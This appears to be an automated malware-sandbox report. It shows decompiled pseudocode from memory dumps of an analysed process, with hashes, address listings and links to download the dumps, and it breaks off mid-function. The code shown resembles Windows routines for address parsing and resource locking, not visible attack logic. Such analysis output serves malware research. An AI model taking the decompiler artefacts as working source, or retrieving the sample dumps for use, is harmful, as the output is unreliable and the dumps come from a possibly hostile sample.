                                                                                                                                                                                    • Instruction ID: 0c05a988210ecae09bde148579da1c9b50deb736d7646e3bb3fff3e4dc09e6d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ab73d9e69a9ccea68ff835158dd9dcc8daa6454a98494d792979d858ae0ef5
                                                                                                                                                                                    • Instruction Fuzzy Hash: B441EA3168031C7AEF21EE94DCD5FEAB3BDAF14704F1405A9E905E6180EB709E458FA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E02690B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                    				void* _t116;
                                                                                                                                                                                    				char _t120;
                                                                                                                                                                                    				short _t121;
                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                    				intOrPtr* _t130;
                                                                                                                                                                                    				char _t132;
                                                                                                                                                                                    				short _t133;
                                                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                                                    				signed int _t156;
                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                    				intOrPtr _t177;
                                                                                                                                                                                    				intOrPtr* _t179;
                                                                                                                                                                                    				intOrPtr _t180;
                                                                                                                                                                                    				void* _t183;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t179 = _a4;
                                                                                                                                                                                    				_t141 =  *_t179;
                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                    				if(_t141 == 0) {
                                                                                                                                                                                    					L41:
                                                                                                                                                                                    					 *_a8 = _t179;
                                                                                                                                                                                    					_t180 = _v24;
                                                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                                                    						if(_t180 != 3) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t174 = _v32;
                                                                                                                                                                                    					if(_t174 == 0) {
                                                                                                                                                                                    						if(_v8 == 7) {
                                                                                                                                                                                    							goto L43;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					L43:
                                                                                                                                                                                    					if(_v16 != 1) {
                                                                                                                                                                                    						if(_v16 != 2) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                    						L47:
                                                                                                                                                                                    						if(_t174 != 0) {
                                                                                                                                                                                    							E02668980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                                    							_t116 = 8;
                                                                                                                                                                                    							E0265DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						return 0;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                                                    						if(_v12 > 3) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t120 = E02690CFA(_v28, 0, 0xa);
                                                                                                                                                                                    						_t183 = _t183 + 0xc;
                                                                                                                                                                                    						if(_t120 > 0xff) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                                    						goto L47;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v12 > 4) {
                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t121 = E02690CFA(_v28, _t180, 0x10);
                                                                                                                                                                                    					_t183 = _t183 + 0xc;
                                                                                                                                                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                                    					goto L47;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						_t123 = _v16;
                                                                                                                                                                                    						if(_t123 == 0) {
                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t108 = _t123 - 1;
                                                                                                                                                                                    						if(_t108 != 0) {
                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t178 = _t141;
                                                                                                                                                                                    						if(E026906BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                                    							if(E026906BA(_t135, _t178) == 0 || E02690A5B(_t136, _t178) == 0) {
                                                                                                                                                                                    								if(_t141 != 0x3a) {
                                                                                                                                                                                    									if(_t141 == 0x2e) {
                                                                                                                                                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                                    											goto L41;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_v24 = _v24 + 1;
                                                                                                                                                                                    											L27:
                                                                                                                                                                                    											_v16 = _v16 & 0x00000000;
                                                                                                                                                                                    											L28:
                                                                                                                                                                                    											if(_v28 == 0) {
                                                                                                                                                                                    												goto L20;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t177 = _v24;
                                                                                                                                                                                    											if(_t177 != 0) {
                                                                                                                                                                                    												if(_v12 > 3) {
                                                                                                                                                                                    													L6:
                                                                                                                                                                                    													return 0xc000000d;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_t132 = E02690CFA(_v28, 0, 0xa);
                                                                                                                                                                                    												_t183 = _t183 + 0xc;
                                                                                                                                                                                    												if(_t132 > 0xff) {
                                                                                                                                                                                    													goto L6;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                                    												goto L20;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											if(_v12 > 4) {
                                                                                                                                                                                    												goto L6;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t133 = E02690CFA(_v28, 0, 0x10);
                                                                                                                                                                                    											_t183 = _t183 + 0xc;
                                                                                                                                                                                    											_v20 = _v20 + 1;
                                                                                                                                                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                                    											goto L20;
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t130 = _t179 + 1;
                                                                                                                                                                                    									if( *_t130 == _t141) {
                                                                                                                                                                                    										if(_v32 != 0) {
                                                                                                                                                                                    											goto L41;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_v32 = _v8 + 1;
                                                                                                                                                                                    										_t156 = 2;
                                                                                                                                                                                    										_v8 = _v8 + _t156;
                                                                                                                                                                                    										L34:
                                                                                                                                                                                    										_t179 = _t130;
                                                                                                                                                                                    										_v16 = _t156;
                                                                                                                                                                                    										goto L28;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                                                    									goto L27;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_v12 = _v12 + 1;
                                                                                                                                                                                    								if(_v24 > 0) {
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_a7 = 1;
                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                                                    							L20:
                                                                                                                                                                                    							_t179 = _t179 + 1;
                                                                                                                                                                                    							_t141 =  *_t179;
                                                                                                                                                                                    							if(_t141 == 0) {
                                                                                                                                                                                    								goto L41;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							continue;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L7:
                                                                                                                                                                                    						if(_t141 == 0x3a) {
                                                                                                                                                                                    							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                                    								goto L41;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t130 = _t179 + 1;
                                                                                                                                                                                    								if( *_t130 != _t141) {
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                                                    								_t156 = 2;
                                                                                                                                                                                    								_v32 = 1;
                                                                                                                                                                                    								_v8 = _t156;
                                                                                                                                                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L8:
                                                                                                                                                                                    						if(_v8 > 7) {
                                                                                                                                                                                    							goto L41;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t142 = _t141;
                                                                                                                                                                                    						if(E026906BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                                    							if(E026906BA(_t124, _t142) == 0 || E02690A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                                    								goto L41;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t128 = 1;
                                                                                                                                                                                    								_a7 = 1;
                                                                                                                                                                                    								_v28 = _t179;
                                                                                                                                                                                    								_v16 = 1;
                                                                                                                                                                                    								_v12 = 1;
                                                                                                                                                                                    								L39:
                                                                                                                                                                                    								if(_v16 == _t128) {
                                                                                                                                                                                    									goto L20;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_a7 = 0;
                                                                                                                                                                                    							_v28 = _t179;
                                                                                                                                                                                    							_v16 = 1;
                                                                                                                                                                                    							_v12 = 1;
                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L1:
                                                                                                                                                                                    				_t123 = _t108 == 1;
                                                                                                                                                                                    				if(_t108 == 1) {
                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t128 = 1;
                                                                                                                                                                                    				goto L39;
                                                                                                                                                                                    			}

























                                                                                                                                                                                    0x02690b21
                                                                                                                                                                                    0x02690b24
                                                                                                                                                                                    0x02690b27
                                                                                                                                                                                    0x02690b2a
                                                                                                                                                                                    0x02690b2d
                                                                                                                                                                                    0x02690b30
                                                                                                                                                                                    0x02690b33
                                                                                                                                                                                    0x02690b36
                                                                                                                                                                                    0x02690b39
                                                                                                                                                                                    0x02690b3e
                                                                                                                                                                                    0x02690c65
                                                                                                                                                                                    0x02690c68
                                                                                                                                                                                    0x02690c6a
                                                                                                                                                                                    0x02690c6f
                                                                                                                                                                                    0x026beb42
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb48
                                                                                                                                                                                    0x026beb48
                                                                                                                                                                                    0x02690c75
                                                                                                                                                                                    0x02690c7a
                                                                                                                                                                                    0x026beb54
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb5a
                                                                                                                                                                                    0x02690c80
                                                                                                                                                                                    0x02690c84
                                                                                                                                                                                    0x026beb98
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beba6
                                                                                                                                                                                    0x02690cb8
                                                                                                                                                                                    0x02690cba
                                                                                                                                                                                    0x02690cd3
                                                                                                                                                                                    0x02690cda
                                                                                                                                                                                    0x02690ce4
                                                                                                                                                                                    0x02690ce9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690cec
                                                                                                                                                                                    0x02690c8c
                                                                                                                                                                                    0x026beb63
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb70
                                                                                                                                                                                    0x026beb75
                                                                                                                                                                                    0x026beb7d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb8c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb8c
                                                                                                                                                                                    0x02690c96
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690ca2
                                                                                                                                                                                    0x02690cac
                                                                                                                                                                                    0x02690cb4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690b44
                                                                                                                                                                                    0x02690b47
                                                                                                                                                                                    0x02690b49
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690b4f
                                                                                                                                                                                    0x02690b50
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690b56
                                                                                                                                                                                    0x02690b62
                                                                                                                                                                                    0x02690b7c
                                                                                                                                                                                    0x02690bac
                                                                                                                                                                                    0x02690a0f
                                                                                                                                                                                    0x026beaaa
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beac4
                                                                                                                                                                                    0x026beac4
                                                                                                                                                                                    0x02690bd0
                                                                                                                                                                                    0x02690bd0
                                                                                                                                                                                    0x02690bd4
                                                                                                                                                                                    0x02690bd9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690bdb
                                                                                                                                                                                    0x02690be0
                                                                                                                                                                                    0x026beb0e
                                                                                                                                                                                    0x02690a1a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690a1a
                                                                                                                                                                                    0x026beb1a
                                                                                                                                                                                    0x026beb1f
                                                                                                                                                                                    0x026beb27
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb36
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb36
                                                                                                                                                                                    0x02690bea
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690bf6
                                                                                                                                                                                    0x02690c00
                                                                                                                                                                                    0x02690c03
                                                                                                                                                                                    0x02690c0b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690c0b
                                                                                                                                                                                    0x026beaaa
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690a15
                                                                                                                                                                                    0x02690bb6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690bc6
                                                                                                                                                                                    0x02690bc6
                                                                                                                                                                                    0x02690bcb
                                                                                                                                                                                    0x02690c15
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690c1d
                                                                                                                                                                                    0x02690c20
                                                                                                                                                                                    0x02690c21
                                                                                                                                                                                    0x02690c24
                                                                                                                                                                                    0x02690c24
                                                                                                                                                                                    0x02690c26
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690c26
                                                                                                                                                                                    0x02690bcd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690bcd
                                                                                                                                                                                    0x02690b89
                                                                                                                                                                                    0x02690b89
                                                                                                                                                                                    0x02690b90
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690b96
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690b96
                                                                                                                                                                                    0x02690a04
                                                                                                                                                                                    0x02690a04
                                                                                                                                                                                    0x02690b9a
                                                                                                                                                                                    0x02690b9a
                                                                                                                                                                                    0x02690b9b
                                                                                                                                                                                    0x02690b9f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690ba5
                                                                                                                                                                                    0x02690ac7
                                                                                                                                                                                    0x02690aca
                                                                                                                                                                                    0x026beacf
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beade
                                                                                                                                                                                    0x026beade
                                                                                                                                                                                    0x026beae3
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beaf3
                                                                                                                                                                                    0x026beaf6
                                                                                                                                                                                    0x026beaf7
                                                                                                                                                                                    0x026beafe
                                                                                                                                                                                    0x026beb01
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beb01
                                                                                                                                                                                    0x026beacf
                                                                                                                                                                                    0x02690ad0
                                                                                                                                                                                    0x02690ad4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690ada
                                                                                                                                                                                    0x02690ae6
                                                                                                                                                                                    0x02690c34
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690c47
                                                                                                                                                                                    0x02690c49
                                                                                                                                                                                    0x02690c4a
                                                                                                                                                                                    0x02690c4e
                                                                                                                                                                                    0x02690c51
                                                                                                                                                                                    0x02690c54
                                                                                                                                                                                    0x02690c57
                                                                                                                                                                                    0x02690c5a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690c60
                                                                                                                                                                                    0x02690afb
                                                                                                                                                                                    0x02690afe
                                                                                                                                                                                    0x02690b02
                                                                                                                                                                                    0x02690b05
                                                                                                                                                                                    0x02690b08
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02690b08
                                                                                                                                                                                    0x02690ae6
                                                                                                                                                                                    0x02690b44
                                                                                                                                                                                    0x026909f8
                                                                                                                                                                                    0x026909f8
                                                                                                                                                                                    0x026909f9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026beaa0
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction ID: 6331d969db86b6c0d5b7b644e5a78d066ad95cde6f68aadd1dda061c0971de17
                                                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46A17B7190420AEEDF24CF68C8447BEB7BDAF05309F24846AD852A7381DF359A85CB95
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                    			E02690554(signed int _a4, char _a8) {
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int* _t49;
                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                    				signed int _t96;
                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                    				signed int _t115;
                                                                                                                                                                                    				signed int* _t119;
                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                    				signed int _t128;
                                                                                                                                                                                    				signed int _t130;
                                                                                                                                                                                    				signed int _t138;
                                                                                                                                                                                    				signed int _t144;
                                                                                                                                                                                    				void* _t158;
                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t96 = _a4;
                                                                                                                                                                                    				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                    				_push(_t138);
                                                                                                                                                                                    				if(_t115 < 0) {
                                                                                                                                                                                    					_t105 =  *[fs:0x18];
                                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                                    						asm("lock xadd [eax], edx");
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					L6:
                                                                                                                                                                                    					_push(_t128);
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						L7:
                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                    						if(_t115 >= 0) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                    							return 0;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                    							_t49 = _t96 + 0x1c;
                                                                                                                                                                                    							_t106 = 1;
                                                                                                                                                                                    							asm("lock xadd [edx], ecx");
                                                                                                                                                                                    							_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                    							__eflags = _t115;
                                                                                                                                                                                    							if(_t115 < 0) {
                                                                                                                                                                                    								L23:
                                                                                                                                                                                    								_t130 = 0;
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027301c0;
                                                                                                                                                                                    									_push(_t144);
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_t51 = E0264F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                                                    									__eflags = _t51 - 0x102;
                                                                                                                                                                                    									if(_t51 != 0x102) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t106 =  *(_t144 + 4);
                                                                                                                                                                                    									_t126 =  *_t144;
                                                                                                                                                                                    									_t86 = E02694FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                                                    									_push(_t126);
                                                                                                                                                                                    									_push(_t86);
                                                                                                                                                                                    									E026A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                                                    									E026A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                    									_t130 = _t130 + 1;
                                                                                                                                                                                    									_t160 = _t158 + 0x28;
                                                                                                                                                                                    									__eflags = _t130 - 2;
                                                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                                                    										E026D217A(_t106, __eflags, _t96);
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_push(0x65);
                                                                                                                                                                                    									E026A3F92();
                                                                                                                                                                                    									_t158 = _t160 + 0xc;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                                                    								if(__eflags < 0) {
                                                                                                                                                                                    									_push(_t51);
                                                                                                                                                                                    									E02693915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                                                    									asm("int3");
                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                    										L32:
                                                                                                                                                                                    										__eflags = _a8;
                                                                                                                                                                                    										if(_a8 == 0) {
                                                                                                                                                                                    											break;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                    										_t119 = _t96 + 0x24;
                                                                                                                                                                                    										_t107 = 1;
                                                                                                                                                                                    										asm("lock xadd [eax], ecx");
                                                                                                                                                                                    										_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                    										_a4 = _t56;
                                                                                                                                                                                    										__eflags = _t56;
                                                                                                                                                                                    										if(_t56 != 0) {
                                                                                                                                                                                    											L40:
                                                                                                                                                                                    											_t128 = 0;
                                                                                                                                                                                    											__eflags = 0;
                                                                                                                                                                                    											while(1) {
                                                                                                                                                                                    												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                    												asm("sbb esi, esi");
                                                                                                                                                                                    												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027301c0;
                                                                                                                                                                                    												_push(_t138);
                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                    												_t58 = E0264F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                                                    												__eflags = _t58 - 0x102;
                                                                                                                                                                                    												if(_t58 != 0x102) {
                                                                                                                                                                                    													break;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_t107 =  *(_t138 + 4);
                                                                                                                                                                                    												_t125 =  *_t138;
                                                                                                                                                                                    												_t75 = E02694FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                                                    												_push(_t125);
                                                                                                                                                                                    												_push(_t75);
                                                                                                                                                                                    												E026A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                                                    												E026A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                    												_t128 = _t128 + 1;
                                                                                                                                                                                    												_t159 = _t158 + 0x28;
                                                                                                                                                                                    												__eflags = _t128 - 2;
                                                                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                                                                    													E026D217A(_t107, __eflags, _t96);
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    												_push(0);
                                                                                                                                                                                    												_push(0x65);
                                                                                                                                                                                    												E026A3F92();
                                                                                                                                                                                    												_t158 = _t159 + 0xc;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											__eflags = _t58;
                                                                                                                                                                                    											if(__eflags < 0) {
                                                                                                                                                                                    												_push(_t58);
                                                                                                                                                                                    												E02693915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                                                    												asm("int3");
                                                                                                                                                                                    												_t61 =  *_t107;
                                                                                                                                                                                    												 *_t107 = 0;
                                                                                                                                                                                    												__eflags = _t61;
                                                                                                                                                                                    												if(_t61 == 0) {
                                                                                                                                                                                    													L1:
                                                                                                                                                                                    													_t63 = E02675384(_t138 + 0x24);
                                                                                                                                                                                    													if(_t63 != 0) {
                                                                                                                                                                                    														goto L52;
                                                                                                                                                                                    													} else {
                                                                                                                                                                                    														goto L2;
                                                                                                                                                                                    													}
                                                                                                                                                                                    												} else {
                                                                                                                                                                                    													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                                                    													_push( &_a4);
                                                                                                                                                                                    													_push(_t61);
                                                                                                                                                                                    													_t70 = E0264F970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                                                    													__eflags = _t70;
                                                                                                                                                                                    													if(__eflags >= 0) {
                                                                                                                                                                                    														goto L1;
                                                                                                                                                                                    													} else {
                                                                                                                                                                                    														_push(_t70);
                                                                                                                                                                                    														E02693915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                                    														L52:
                                                                                                                                                                                    														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                    														_push( &_a4);
                                                                                                                                                                                    														_push(1);
